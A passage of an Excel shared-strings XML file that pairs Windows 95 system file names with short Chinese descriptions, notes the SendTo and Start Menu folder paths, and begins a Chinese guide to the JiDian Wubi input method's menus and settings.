    <t>ROBOTZWI.WAV</t>
  </si>
  <si>
    <t>ROMAN.FON</t>
  </si>
  <si>
    <t>字型文件</t>
  </si>
  <si>
    <t>ROUTE.EXE</t>
  </si>
  <si>
    <t>RPCLTC1.DLL</t>
  </si>
  <si>
    <t>远程调用库</t>
  </si>
  <si>
    <t>RPCNS4.DLL</t>
  </si>
  <si>
    <t>RPCPP.DLL</t>
  </si>
  <si>
    <t>远程调用打印驱动</t>
  </si>
  <si>
    <t>RPCRT4.DLL</t>
  </si>
  <si>
    <t>RPCSS.EXE</t>
  </si>
  <si>
    <t>远程调用结点映象</t>
  </si>
  <si>
    <t>RPLBOOT.SYS</t>
  </si>
  <si>
    <t>远程程序装入</t>
  </si>
  <si>
    <t>RPLIMAGE.DLL</t>
  </si>
  <si>
    <t>远程程序装入磁盘映象器</t>
  </si>
  <si>
    <t>RSRC16.DLL</t>
  </si>
  <si>
    <t>资源计量器</t>
  </si>
  <si>
    <t>RSRCMTR.EXE</t>
  </si>
  <si>
    <t>RSRCMTR.INF</t>
  </si>
  <si>
    <t>RUMOR.EXE</t>
  </si>
  <si>
    <t>DDE测试/游戏</t>
  </si>
  <si>
    <t>RUNDLL.EXE</t>
  </si>
  <si>
    <t>把DLL作为应用程序运行</t>
  </si>
  <si>
    <t>RUNDLL32.EXE</t>
  </si>
  <si>
    <t>32位壳组件</t>
  </si>
  <si>
    <t>S</t>
  </si>
  <si>
    <t>S3.DRV</t>
  </si>
  <si>
    <t>S3显示驱动</t>
  </si>
  <si>
    <t>S3.VXD</t>
  </si>
  <si>
    <t>S3虚拟设备</t>
  </si>
  <si>
    <t>SACLIEN.DLL</t>
  </si>
  <si>
    <t>SAMPLEVIDEOS</t>
  </si>
  <si>
    <t>图象文件</t>
  </si>
  <si>
    <t>SAPNSP.DLL</t>
  </si>
  <si>
    <t>Winsock数据连接库</t>
  </si>
  <si>
    <t>SAVE32.COM</t>
  </si>
  <si>
    <t>安装时所需的TSR文件</t>
  </si>
  <si>
    <t>SB16.VXD</t>
  </si>
  <si>
    <t>16位声卡虚拟设备</t>
  </si>
  <si>
    <t>SB16SND.DRV</t>
  </si>
  <si>
    <t>16位声卡驱动</t>
  </si>
  <si>
    <t>SBAWE.VXD</t>
  </si>
  <si>
    <t>AWE声卡虚拟设备</t>
  </si>
  <si>
    <t>SBAWE32.DRV</t>
  </si>
  <si>
    <t>AWE声卡驱动</t>
  </si>
  <si>
    <t>SBFM.DRV</t>
  </si>
  <si>
    <t>SCANDISK.BAT</t>
  </si>
  <si>
    <t>SCANDISK.INI</t>
  </si>
  <si>
    <t>磁盘诊断工具</t>
  </si>
  <si>
    <t>SCANDISK.PIF</t>
  </si>
  <si>
    <t>安装磁盘诊断工具时的PIF文件</t>
  </si>
  <si>
    <t>SCANDSKW.EXE</t>
  </si>
  <si>
    <t>磁盘扫描工具</t>
  </si>
  <si>
    <t>SCANPROG.EXE</t>
  </si>
  <si>
    <t>SCRNSAVE.SCR</t>
  </si>
  <si>
    <t>屏幕保护</t>
  </si>
  <si>
    <t>SCSI.INF</t>
  </si>
  <si>
    <t>SCSI安装文件文件名描述</t>
  </si>
  <si>
    <t>SCSIIHLP.VXD</t>
  </si>
  <si>
    <t>SCSI支持文件</t>
  </si>
  <si>
    <t>SCSIPORT.PDR</t>
  </si>
  <si>
    <t>SCSI虚拟设备口</t>
  </si>
  <si>
    <t>SECUR32.DLL</t>
  </si>
  <si>
    <t>SECURCL.DLL</t>
  </si>
  <si>
    <t>SEIKO24E.DRV</t>
  </si>
  <si>
    <t>SEIKOSH9.DRV</t>
  </si>
  <si>
    <t>SERIAL.VXD</t>
  </si>
  <si>
    <t>串口VCOMM驱动器</t>
  </si>
  <si>
    <t>SERIFE.FON</t>
  </si>
  <si>
    <t>SERVER.HLP</t>
  </si>
  <si>
    <t>服务器帮助文件</t>
  </si>
  <si>
    <t>SE小乖IR.EXE</t>
  </si>
  <si>
    <t>SBS文件</t>
  </si>
  <si>
    <t>SETUP.BIN</t>
  </si>
  <si>
    <t>安装支持文件</t>
  </si>
  <si>
    <t>SETUP.BMP</t>
  </si>
  <si>
    <t>安装Wash位图文件</t>
  </si>
  <si>
    <t>SETUP.EXE</t>
  </si>
  <si>
    <t>Windows95安装程序</t>
  </si>
  <si>
    <t>SETUP.INF</t>
  </si>
  <si>
    <t>SETUP.TXT</t>
  </si>
  <si>
    <t>安装时的README文件</t>
  </si>
  <si>
    <t>SETUP4.DLL</t>
  </si>
  <si>
    <t>SETUPPP.INF</t>
  </si>
  <si>
    <t>SETUPX.DLL</t>
  </si>
  <si>
    <t>安装支持</t>
  </si>
  <si>
    <t>SETVER.EXE</t>
  </si>
  <si>
    <t>MSDOS版本显示,该程序可在网络上执行</t>
  </si>
  <si>
    <t>SF4029.EXE</t>
  </si>
  <si>
    <t>SHARE.EXE</t>
  </si>
  <si>
    <t>MSDOS共享实用程序</t>
  </si>
  <si>
    <t>SHELL.INF</t>
  </si>
  <si>
    <t>安装壳信息</t>
  </si>
  <si>
    <t>SHELL.VXD</t>
  </si>
  <si>
    <t>虚拟壳设备</t>
  </si>
  <si>
    <t>SHELL2.INF</t>
  </si>
  <si>
    <t>颜色组合</t>
  </si>
  <si>
    <t>SHELL3.INF</t>
  </si>
  <si>
    <t>SIZE1-1.CUR</t>
  </si>
  <si>
    <t>光标</t>
  </si>
  <si>
    <t>SIZE1-M.CUR</t>
  </si>
  <si>
    <t>SIZE4-M.CUR</t>
  </si>
  <si>
    <t>SIZENESW.ANI</t>
  </si>
  <si>
    <t>活动光标</t>
  </si>
  <si>
    <t>SIZEWE.ANI-</t>
  </si>
  <si>
    <t>SKPSFA-1.SPD</t>
  </si>
  <si>
    <t>SLAN.DOS</t>
  </si>
  <si>
    <t>网络适配器驱动</t>
  </si>
  <si>
    <t>SLCD32.MPD</t>
  </si>
  <si>
    <t>SCSI驱动器</t>
  </si>
  <si>
    <t>SLENH.DLL</t>
  </si>
  <si>
    <t>高级节能选项</t>
  </si>
  <si>
    <t>SMALLE.FON</t>
  </si>
  <si>
    <t>SMALLF.FON</t>
  </si>
  <si>
    <t>SMARTDRV.EXE</t>
  </si>
  <si>
    <t>超高速缓存程序</t>
  </si>
  <si>
    <t>SMARTND.DOS</t>
  </si>
  <si>
    <t>网络适配器驱动器</t>
  </si>
  <si>
    <t>SMC3000.DOS</t>
  </si>
  <si>
    <t>SMC9000.VXD</t>
  </si>
  <si>
    <t>SNAPSHOT.EXE</t>
  </si>
  <si>
    <t>抽点</t>
  </si>
  <si>
    <t>SNAPSHOT.VXD</t>
  </si>
  <si>
    <t>抽点虚拟设备</t>
  </si>
  <si>
    <t>SNDREC32.EXE</t>
  </si>
  <si>
    <t>录音机</t>
  </si>
  <si>
    <t>SNIP.VXD</t>
  </si>
  <si>
    <t>网络适配驱动器</t>
  </si>
  <si>
    <t>SOCKET.VXD</t>
  </si>
  <si>
    <t>SOL.CNT</t>
  </si>
  <si>
    <t>纸牌游戏</t>
  </si>
  <si>
    <t>SOL.HLP</t>
  </si>
  <si>
    <t>纸牌游戏帮助文件</t>
  </si>
  <si>
    <t>SORT.EXE</t>
  </si>
  <si>
    <t>MSDOS分类实用程序</t>
  </si>
  <si>
    <t>SOUNDREC.CNT</t>
  </si>
  <si>
    <t>录音机帮助文件内容</t>
  </si>
  <si>
    <t>SOUNDREC.HLP</t>
  </si>
  <si>
    <t>录音机帮助文件</t>
  </si>
  <si>
    <t>SPARROW.WPD</t>
  </si>
  <si>
    <t>SPARROWX.MPD</t>
  </si>
  <si>
    <t>SPOOL32.EXE</t>
  </si>
  <si>
    <t>打印机支持</t>
  </si>
  <si>
    <t>SPOOLER.VXD</t>
  </si>
  <si>
    <t>打印机共享虚拟设备</t>
  </si>
  <si>
    <t>SRAMMTD.VXD</t>
  </si>
  <si>
    <t>SSERIFE.FON</t>
  </si>
  <si>
    <t>SSERIFF.FON</t>
  </si>
  <si>
    <t>SSFLYWIN.SCR</t>
  </si>
  <si>
    <t>SSSTARS.SCR</t>
  </si>
  <si>
    <t>STAR24E.DRV</t>
  </si>
  <si>
    <t>STAR9E.DRV</t>
  </si>
  <si>
    <t>START.EXE</t>
  </si>
  <si>
    <t>启动程序</t>
  </si>
  <si>
    <t>STATE.PBK</t>
  </si>
  <si>
    <t>STDOLE.TLB</t>
  </si>
  <si>
    <t>OLE2.0文件</t>
  </si>
  <si>
    <t>STDOLE32.TLB</t>
  </si>
  <si>
    <t>OLE2-32文件</t>
  </si>
  <si>
    <t>STEMO409.DLL</t>
  </si>
  <si>
    <t>Windows95帮助文件的DLL</t>
  </si>
  <si>
    <t>STLSO4SS.SPD</t>
  </si>
  <si>
    <t>STLS577U.SPD</t>
  </si>
  <si>
    <t>STORAGE.DLL</t>
  </si>
  <si>
    <t>OLE存储器管理库</t>
  </si>
  <si>
    <t>STRN.DOS</t>
  </si>
  <si>
    <t>SUBST.EXE</t>
  </si>
  <si>
    <t>SUEXPAND.DLL</t>
  </si>
  <si>
    <t>SUHELPER.BIN</t>
  </si>
  <si>
    <t>SUPERVGA.DRV</t>
  </si>
  <si>
    <t>高级VGA显示驱动</t>
  </si>
  <si>
    <t>SURPORT.TXT</t>
  </si>
  <si>
    <t>PSS支持信息</t>
  </si>
  <si>
    <t>SVCPROP.DLL</t>
  </si>
  <si>
    <t>SVRAPI.DLL</t>
  </si>
  <si>
    <t>32位公用服务器API实用程序</t>
  </si>
  <si>
    <t>SXCIEXT.DLL</t>
  </si>
  <si>
    <t>Matrox显示驱动支持文件</t>
  </si>
  <si>
    <t>SYMBOLE.FON</t>
  </si>
  <si>
    <t>SYS.COM</t>
  </si>
  <si>
    <t>MSDOS系统实用程序</t>
  </si>
  <si>
    <t>SYSCLASS.DLL</t>
  </si>
  <si>
    <t>系统类库安装</t>
  </si>
  <si>
    <t>SYSDETMG.DLL</t>
  </si>
  <si>
    <t>系统检测库</t>
  </si>
  <si>
    <t>系统编辑器</t>
  </si>
  <si>
    <t>SYSLOGO.RLE</t>
  </si>
  <si>
    <t>系统标识</t>
  </si>
  <si>
    <t>SYSMON.EXE</t>
  </si>
  <si>
    <t>系统监控程序</t>
  </si>
  <si>
    <t>SYSMON.HLP</t>
  </si>
  <si>
    <t>系统监控帮助</t>
  </si>
  <si>
    <t>SYSTEM.DRV</t>
  </si>
  <si>
    <t>最小Win3.1标准模式</t>
  </si>
  <si>
    <t>SYSTHUNK.DLL</t>
  </si>
  <si>
    <t>Windows系统形实替换程序库</t>
  </si>
  <si>
    <t>SYSTRAY.EXE</t>
  </si>
  <si>
    <t>高级节能管理</t>
  </si>
  <si>
    <t>T</t>
  </si>
  <si>
    <t>T128.MPD</t>
  </si>
  <si>
    <t>T160.MPD</t>
  </si>
  <si>
    <t>T20N3.VXD</t>
  </si>
  <si>
    <t>T30ND.DOS</t>
  </si>
  <si>
    <t>T338.MPD</t>
  </si>
  <si>
    <t>TADA.WAV</t>
  </si>
  <si>
    <t>TAPI.DLL</t>
  </si>
  <si>
    <t>API通话程序</t>
  </si>
  <si>
    <t>TAPI.INF</t>
  </si>
  <si>
    <t>API通话安装信息文件</t>
  </si>
  <si>
    <t>TAPI32.DLL</t>
  </si>
  <si>
    <t>32位形实替换</t>
  </si>
  <si>
    <t>TAPIADDR.DLL</t>
  </si>
  <si>
    <t>TAPIEXE.EXE</t>
  </si>
  <si>
    <t>API通话组件</t>
  </si>
  <si>
    <t>TAPIINI.EXE</t>
  </si>
  <si>
    <t>TASKMAM.EXE</t>
  </si>
  <si>
    <t>任务管理器</t>
  </si>
  <si>
    <t>TCCARC.DOS</t>
  </si>
  <si>
    <t>TCTOKCH.VXD</t>
  </si>
  <si>
    <t>TELEPHON.CPL</t>
  </si>
  <si>
    <t>通话帮助</t>
  </si>
  <si>
    <t>TESTPS.TXT</t>
  </si>
  <si>
    <t>PostScript测试</t>
  </si>
  <si>
    <t>TEXTCHAT.EXE</t>
  </si>
  <si>
    <t>THEMIC-1.WAV</t>
  </si>
  <si>
    <t>THINKJET.DRV</t>
  </si>
  <si>
    <t>THREED.VBX</t>
  </si>
  <si>
    <t>Windows95浏览</t>
  </si>
  <si>
    <t>T1850.DRV</t>
  </si>
  <si>
    <t>TIMEDATE.CPL</t>
  </si>
  <si>
    <t>时间/日期控制面板</t>
  </si>
  <si>
    <t>TIMES.TTF</t>
  </si>
  <si>
    <t>时间字型</t>
  </si>
  <si>
    <t>TIMESBD.TTF</t>
  </si>
  <si>
    <t>时间粗体字型</t>
  </si>
  <si>
    <t>TIMESBI.TTF</t>
  </si>
  <si>
    <t>时间粗斜体字型</t>
  </si>
  <si>
    <t>TIMESI.TTF</t>
  </si>
  <si>
    <t>时间斜体字型</t>
  </si>
  <si>
    <t>TIMEZONE.INF</t>
  </si>
  <si>
    <t>TIMLP232.SPD</t>
  </si>
  <si>
    <t>TIPS.txt</t>
  </si>
  <si>
    <t>提示和技巧自述文件</t>
  </si>
  <si>
    <t>TKPHZR32.SPD</t>
  </si>
  <si>
    <t>TLNK.DOS</t>
  </si>
  <si>
    <t>TLNK3.VXD</t>
  </si>
  <si>
    <t>TMV1.MPD</t>
  </si>
  <si>
    <t>TOOLHELP.DLL</t>
  </si>
  <si>
    <t>16位开发工具帮助器</t>
  </si>
  <si>
    <t>TOSHIBA.DRV</t>
  </si>
  <si>
    <t>TOUR.EXE</t>
  </si>
  <si>
    <t>浏览文件</t>
  </si>
  <si>
    <t>TPHAIII.ICM</t>
  </si>
  <si>
    <t>TRACERT.EXE</t>
  </si>
  <si>
    <t>TREE.COM</t>
  </si>
  <si>
    <t>TREEEDCL.DLL</t>
  </si>
  <si>
    <t>TREENVCL.DLL</t>
  </si>
  <si>
    <t>TRIUMPHI.SPD</t>
  </si>
  <si>
    <t>TSD32.DLL</t>
  </si>
  <si>
    <t>声音压缩管理器</t>
  </si>
  <si>
    <t>TSENG.DRV</t>
  </si>
  <si>
    <t>ET4000W32显示驱动</t>
  </si>
  <si>
    <t>TTY.DRV</t>
  </si>
  <si>
    <t>TTY.HLP</t>
  </si>
  <si>
    <t>TTY打印机驱动帮助</t>
  </si>
  <si>
    <t>TYPELIB.DLL</t>
  </si>
  <si>
    <t>OLE2.0</t>
  </si>
  <si>
    <t>U</t>
  </si>
  <si>
    <t>U9415470.SPD</t>
  </si>
  <si>
    <t>UBNEI.DOS</t>
  </si>
  <si>
    <t>ULTRA124.MPD</t>
  </si>
  <si>
    <t>ULTRA24F.MPD</t>
  </si>
  <si>
    <t>UMDM16.DLL</t>
  </si>
  <si>
    <t>通用调制解调器驱动组件</t>
  </si>
  <si>
    <t>UMDM32.DLL</t>
  </si>
  <si>
    <t>UNIDRV.DLL</t>
  </si>
  <si>
    <t>Microsoft通用打印机驱动库</t>
  </si>
  <si>
    <t>UNIDRV.HLP</t>
  </si>
  <si>
    <t>通用打印机驱动帮助</t>
  </si>
  <si>
    <t>UNIMODEM.VXD</t>
  </si>
  <si>
    <t>通用调制解调器驱动</t>
  </si>
  <si>
    <t>USER32.DLL</t>
  </si>
  <si>
    <t>32位用户</t>
  </si>
  <si>
    <t>V</t>
  </si>
  <si>
    <t>V86MMGR.VXD</t>
  </si>
  <si>
    <t>V86MMGR虚拟设备</t>
  </si>
  <si>
    <t>VCACHE.VXD</t>
  </si>
  <si>
    <t>VCache虚拟设备</t>
  </si>
  <si>
    <t>VCD.VXD</t>
  </si>
  <si>
    <t>虚拟COM驱动程序</t>
  </si>
  <si>
    <t>VCOMM.VXD</t>
  </si>
  <si>
    <t>VCOMM驱动程序</t>
  </si>
  <si>
    <t>VCOND.VXD</t>
  </si>
  <si>
    <t>Win32控制台</t>
  </si>
  <si>
    <t>VDMAD.VXD</t>
  </si>
  <si>
    <t>VDMAD虚拟设备</t>
  </si>
  <si>
    <t>VER.DLL</t>
  </si>
  <si>
    <t>小型Win3.1安装程序16位版动态链接库</t>
  </si>
  <si>
    <t>VER.NEW</t>
  </si>
  <si>
    <t>版本检测与文件安装库</t>
  </si>
  <si>
    <t>VERSION.DLL</t>
  </si>
  <si>
    <t>32位版本动态链接库</t>
  </si>
  <si>
    <t>VERX.DLL</t>
  </si>
  <si>
    <t>安装程序使用的版本动态库</t>
  </si>
  <si>
    <t>VFAT.VXD</t>
  </si>
  <si>
    <t>VFAT文件系统</t>
  </si>
  <si>
    <t>VFD.VXD</t>
  </si>
  <si>
    <t>软盘虚拟设备</t>
  </si>
  <si>
    <t>VFLATD.VXD</t>
  </si>
  <si>
    <t>虚拟平板帧缓存虚拟设备</t>
  </si>
  <si>
    <t>VGA.DRV</t>
  </si>
  <si>
    <t>VGA显示驱动程序</t>
  </si>
  <si>
    <t>VIDCAP.INF</t>
  </si>
  <si>
    <t>即插即用VCD信息</t>
  </si>
  <si>
    <t>VIDEOT.VXD</t>
  </si>
  <si>
    <t>视频虚拟设备</t>
  </si>
  <si>
    <t>VIP.386</t>
  </si>
  <si>
    <t>TCP/IP虚拟IP设备</t>
  </si>
  <si>
    <t>VJOYD.VXD</t>
  </si>
  <si>
    <t>游戏棒虚拟设备</t>
  </si>
  <si>
    <t>VKD.VXD</t>
  </si>
  <si>
    <t>虚拟键盘设备</t>
  </si>
  <si>
    <t>VLB32.DLL</t>
  </si>
  <si>
    <t>VMD.VXD</t>
  </si>
  <si>
    <t>Win3.1虚拟鼠标驱动程序</t>
  </si>
  <si>
    <t>VMM.VXD</t>
  </si>
  <si>
    <t>虚拟存储管理设备</t>
  </si>
  <si>
    <t>VMM32.VXD</t>
  </si>
  <si>
    <t>VMOUSE.VXD</t>
  </si>
  <si>
    <t>虚拟鼠标驱动程序</t>
  </si>
  <si>
    <t>VNBT.386</t>
  </si>
  <si>
    <t>NetBIOS传输驱动程序</t>
  </si>
  <si>
    <t>VNETBIOS.VXD</t>
  </si>
  <si>
    <t>VNETBIOS虚拟设备</t>
  </si>
  <si>
    <t>VNETSUP.VXD</t>
  </si>
  <si>
    <t>网络支持虚拟设备</t>
  </si>
  <si>
    <t>VPD.VXD</t>
  </si>
  <si>
    <t>虚拟LPT驱动程序</t>
  </si>
  <si>
    <t>VPICD.VXD</t>
  </si>
  <si>
    <t>虚拟可编程干扰控制器设备</t>
  </si>
  <si>
    <t>VPOWERD.VXD</t>
  </si>
  <si>
    <t>高级电源管理虚拟设备</t>
  </si>
  <si>
    <t>VREDIR.VXD</t>
  </si>
  <si>
    <t>Microsoft网络32位客户端程序</t>
  </si>
  <si>
    <t>VSAMI.DLL</t>
  </si>
  <si>
    <t>AMI文件语法分析程序</t>
  </si>
  <si>
    <t>VSASC8.DLL</t>
  </si>
  <si>
    <t>ASCII文件语法分析程序</t>
  </si>
  <si>
    <t>VSBMP.DLL</t>
  </si>
  <si>
    <t>BMP文件语法分析程序</t>
  </si>
  <si>
    <t>VSERVER.VXD</t>
  </si>
  <si>
    <t>Microsoft网络32位服务器端程序</t>
  </si>
  <si>
    <t>VSGIF.DLL</t>
  </si>
  <si>
    <t>GIF文件语法分析程序</t>
  </si>
  <si>
    <t>VSHARE.VXD</t>
  </si>
  <si>
    <t>32位共享虚拟设备驱动程序</t>
  </si>
  <si>
    <t>VSMSW.DLL</t>
  </si>
  <si>
    <t>Win写文件语法分析</t>
  </si>
  <si>
    <t>VSPP.DLL</t>
  </si>
  <si>
    <t>PowerPoint语法分析程序</t>
  </si>
  <si>
    <t>VSRTF.DLL</t>
  </si>
  <si>
    <t>RTF文件语法分析程序</t>
  </si>
  <si>
    <t>VSTIFF.DLL</t>
  </si>
  <si>
    <t>TIFF文件语法分析程序</t>
  </si>
  <si>
    <t>VSW6.DLL</t>
  </si>
  <si>
    <t>Word6文件语法分析程序</t>
  </si>
  <si>
    <t>VSWORD.DLL</t>
  </si>
  <si>
    <t>Word文件语法分析程序</t>
  </si>
  <si>
    <t>VSWP5.DLL</t>
  </si>
  <si>
    <t>WordPerfect5文件语法分析程序</t>
  </si>
  <si>
    <t>VSXL5.DLL</t>
  </si>
  <si>
    <t>Excel文件/图表语法分析程序</t>
  </si>
  <si>
    <t>VTCP.386</t>
  </si>
  <si>
    <t>TCP/IP虚拟TCP驱动程序</t>
  </si>
  <si>
    <t>VTDAPI.VXD</t>
  </si>
  <si>
    <t>VTDAPI虚拟设备</t>
  </si>
  <si>
    <t>VTDI.386</t>
  </si>
  <si>
    <t>传输驱动接口支持程序</t>
  </si>
  <si>
    <t>VXDLDR.VXD</t>
  </si>
  <si>
    <t>虚拟设备驱动程序装载器</t>
  </si>
  <si>
    <t>W</t>
  </si>
  <si>
    <t>WAVE.INF</t>
  </si>
  <si>
    <t>即插即用音波设备信息</t>
  </si>
  <si>
    <t>WDTOOOEX.MPD</t>
  </si>
  <si>
    <t>SCSI驱动</t>
  </si>
  <si>
    <t>WGPOADMN.DLL</t>
  </si>
  <si>
    <t>WHLP16T.DLL</t>
  </si>
  <si>
    <t>帮助动态链接库</t>
  </si>
  <si>
    <t>WIN87EM.DLL</t>
  </si>
  <si>
    <t>80387数学仿真库</t>
  </si>
  <si>
    <t>WINABC.HLP</t>
  </si>
  <si>
    <t>智能ABC帮助文件</t>
  </si>
  <si>
    <t>WINBX.HLP</t>
  </si>
  <si>
    <t>表形码输入法帮助文件</t>
  </si>
  <si>
    <t>WINCHA.HLP</t>
  </si>
  <si>
    <t>繁体仓颉输入法帮助文件</t>
  </si>
  <si>
    <t>WINDOWS.CNT</t>
  </si>
  <si>
    <t>Windows95帮助文件内容</t>
  </si>
  <si>
    <t>WINDOWS.HLP</t>
  </si>
  <si>
    <t>Windows95帮助文件</t>
  </si>
  <si>
    <t>WINFILE.CNT</t>
  </si>
  <si>
    <t>文件管理器帮助文件内容</t>
  </si>
  <si>
    <t>WINFILE.EXE</t>
  </si>
  <si>
    <t>Windows工作组文件管理器</t>
  </si>
  <si>
    <t>WINFILE.HLP</t>
  </si>
  <si>
    <t>文件管理器帮助文件</t>
  </si>
  <si>
    <t>WINGB.HLP</t>
  </si>
  <si>
    <t>区位码输入法帮助文件</t>
  </si>
  <si>
    <t>WINHLP23.HLP</t>
  </si>
  <si>
    <t>WINIME.HLP</t>
  </si>
  <si>
    <t>*作指南帮助文件</t>
  </si>
  <si>
    <t>WINNM.HLP</t>
  </si>
  <si>
    <t>GBK内码输入法帮助文件</t>
  </si>
  <si>
    <t>WININIT.EXE</t>
  </si>
  <si>
    <t>Windows初始化文件</t>
  </si>
  <si>
    <t>WINIPCFG.EXE</t>
  </si>
  <si>
    <t>TCP/IP配置工具</t>
  </si>
  <si>
    <t>WINNEWS.TXT</t>
  </si>
  <si>
    <t>Winnews信息</t>
  </si>
  <si>
    <t>WINPHO.HLP</t>
  </si>
  <si>
    <t>繁体注音输入法帮助文件</t>
  </si>
  <si>
    <t>WINPOPUP.EXE</t>
  </si>
  <si>
    <t>POPUP工具</t>
  </si>
  <si>
    <t>WINREG.DLL</t>
  </si>
  <si>
    <t>远程注册支持</t>
  </si>
  <si>
    <t>WINPY.HLP</t>
  </si>
  <si>
    <t>全拼输入法帮助文件</t>
  </si>
  <si>
    <t>WINSOCK.DLL</t>
  </si>
  <si>
    <t>Windows的套接API</t>
  </si>
  <si>
    <t>WINSY.HLP</t>
  </si>
  <si>
    <t>双拼输入法帮助文件</t>
  </si>
  <si>
    <t>WINXSP.HLP</t>
  </si>
  <si>
    <t>GBK双拼输入法帮助文件</t>
  </si>
  <si>
    <t>WINXZM.HLP</t>
  </si>
  <si>
    <t>GBK郑码输入法帮助</t>
  </si>
  <si>
    <t>WINZM.HLP</t>
  </si>
  <si>
    <t>郑码输入法帮助文件</t>
  </si>
  <si>
    <t>WNASPI32.DLL</t>
  </si>
  <si>
    <t>WPSUNI.DRV</t>
  </si>
  <si>
    <t>传真驱动程序</t>
  </si>
  <si>
    <t>WPSUNIRE.DLL</t>
  </si>
  <si>
    <t>WPS主机资源执行程序</t>
  </si>
  <si>
    <t>X</t>
  </si>
  <si>
    <t>XCOPY.EXE</t>
  </si>
  <si>
    <t>XCOPY32.EXE</t>
  </si>
  <si>
    <t>文件拷贝程序</t>
  </si>
  <si>
    <t>XGA.DRV</t>
  </si>
  <si>
    <t>XGA显示驱动程序</t>
  </si>
  <si>
    <r>
      <t>1 send to:</t>
    </r>
    <r>
      <rPr>
        <sz val="13.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>“C:＼WINDOWS＼SendTo”（2000及XP为C:\Documents and Settings\用户名\SendTo）(vista: C:\Users\wwu\SendTo)目录下</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 start menu:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> “C:\Documents and Settings\ 用户名\「开始」菜单\程序”Vista: C:\Users\All Users\Start Menu</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>极点五笔入门指南</t>
  </si>
  <si>
    <t>1、状态栏菜单： 在输入法的状态栏或汉字候选窗上点击鼠标右键出现下面的菜单。</t>
  </si>
  <si>
    <t>菜单名称</t>
  </si>
  <si>
    <t>内容说明</t>
  </si>
  <si>
    <t>输入法设置</t>
  </si>
  <si>
    <t>图形设置模式</t>
  </si>
  <si>
    <t>专家设置模式</t>
  </si>
  <si>
    <t>是图形设置模式的补充，这里包含了极点的所有系统设置。建议高级用户使用。</t>
  </si>
  <si>
    <t>极点预设的设置</t>
  </si>
  <si>
    <t>极点预设了两种配置，“五笔高手”适合五笔熟手或之前使用过极点、加加等的用户使用；“五笔新手”适合传统五笔用户使用。</t>
  </si>
  <si>
    <t>设置另存为</t>
  </si>
  <si>
    <t>将极点设置成符合自己输入习惯后，将这种设置保存下来。</t>
  </si>
  <si>
    <t>管理工具</t>
  </si>
  <si>
    <t>极点词库维护</t>
  </si>
  <si>
    <t>用于生成或导出极点的词库，批量加词与删词也在此维护工具中。具体内容见此功能的提示窗口。</t>
  </si>
  <si>
    <t>切换词库</t>
  </si>
  <si>
    <t>如果系统中安装了多套输入方案：如86版五笔和98版五笔，可以通过此项来进行切换</t>
  </si>
  <si>
    <t>备份词库与设置</t>
  </si>
  <si>
    <t>备份极点当前的系统设置与词库。</t>
  </si>
  <si>
    <t>恢复词库与设置</t>
  </si>
  <si>
    <t>恢复极点的系统设置与词库</t>
  </si>
  <si>
    <t> 切换皮肤</t>
  </si>
  <si>
    <t>隐藏状态栏</t>
  </si>
  <si>
    <t>用于隐藏极点的状态栏</t>
  </si>
  <si>
    <t>你已安装的皮肤</t>
  </si>
  <si>
    <t>列出你已安装的极点皮肤，可通过此菜单快速切换皮肤。</t>
  </si>
  <si>
    <t>注： 还可通过“图形设置模式”中的“界面设置”选择皮肤和修改各种外观设置。</t>
  </si>
  <si>
    <t>现用皮肤信息</t>
  </si>
  <si>
    <t>显示现在皮肤的作者等相关信息</t>
  </si>
  <si>
    <t>使用说明</t>
  </si>
  <si>
    <t>用于显示本文件。</t>
  </si>
  <si>
    <t>版本信息</t>
  </si>
  <si>
    <t>显示极点的版本信息号。</t>
  </si>
  <si>
    <t>2、图形界面设置</t>
  </si>
  <si>
    <t>设置项目</t>
  </si>
  <si>
    <t>设置项含义</t>
  </si>
  <si>
    <t>基本设置</t>
  </si>
  <si>
    <t>启用编码逐渐提示</t>
  </si>
  <si>
    <t>选中此项，当你录入编码a时，除显示a对应的“工”字外，极点还会提示所有编码以a开头的字和词组，如：“式a 节b”等。</t>
  </si>
  <si>
    <t>启用单字输入模式</t>
  </si>
  <si>
    <t>选中此项，只能输入单字，不能输入词组。</t>
  </si>
  <si>
    <t>提示系统已有词组</t>
  </si>
  <si>
    <t>选中此项，如词库中有“中国”一词，但你以“中”、“国”的方式来录入，系统会提示你。如果提示多次你仍不用此词组，则此词组会自动隐藏（是否隐藏受“高级设置”中的“智能隐藏词组”选项来定）</t>
  </si>
  <si>
    <t>空码时清除已输入编码</t>
  </si>
  <si>
    <t>启用此项，如果你输入一个3码以上的空码时，极点会清除已输入的编码并等待你输入新编码；否则极点等待你修改已输入编码，或继续输入新编码。</t>
  </si>
  <si>
    <t>启用自动调频</t>
  </si>
  <si>
    <t>启用此项，有重码时被选择的候选项自动调位至首位。</t>
  </si>
  <si>
    <t>注：但单字不参与这种调频，而只能以Ctrl+序号的方式调整。</t>
  </si>
  <si>
    <t>字符半角时空格全角</t>
  </si>
  <si>
    <t>在编辑WORD文档时，段首通常要缩进2个汉字位置，选用此项可以方便的实现此功能。</t>
  </si>
  <si>
    <t>显示词库中全部字词</t>
  </si>
  <si>
    <t>极点默认安装完后，仅检索与显示常用的字词，像一些广东的白话字并不显示。如果要输入这些字需要选中此选项。</t>
  </si>
  <si>
    <t>重码或空码时发声提示</t>
  </si>
  <si>
    <t>选中此项，当你录入空码或有重码时，极点会发声提示你。如果同时选中“使用声音文件”，则使用声卡提示，否则使用机器的扬声器提示。</t>
  </si>
  <si>
    <t>启用词组联想功能</t>
  </si>
  <si>
    <t>是否启用词组联想。</t>
  </si>
  <si>
    <t>高级设置</t>
  </si>
  <si>
    <t>智能隐藏不用词组</t>
  </si>
  <si>
    <t>选中此项，被分开录入的词组及始终不选用的重码会被自动隐藏。对于单字重码，不被选用的单字会被自动转为“生僻字”。</t>
  </si>
  <si>
    <t>Shift+字母转英文</t>
  </si>
  <si>
    <t>按Shift＋字母自动转到临时英文状态，按回车后输出所输入的英文并返回中文输入状态。</t>
  </si>
  <si>
    <t>启用打字音效功能</t>
  </si>
  <si>
    <t>选中此项，你的计算机就像一台打字机（五笔新手学习可以时使用此功能）。</t>
  </si>
  <si>
    <t>全码时才显示词组</t>
  </si>
  <si>
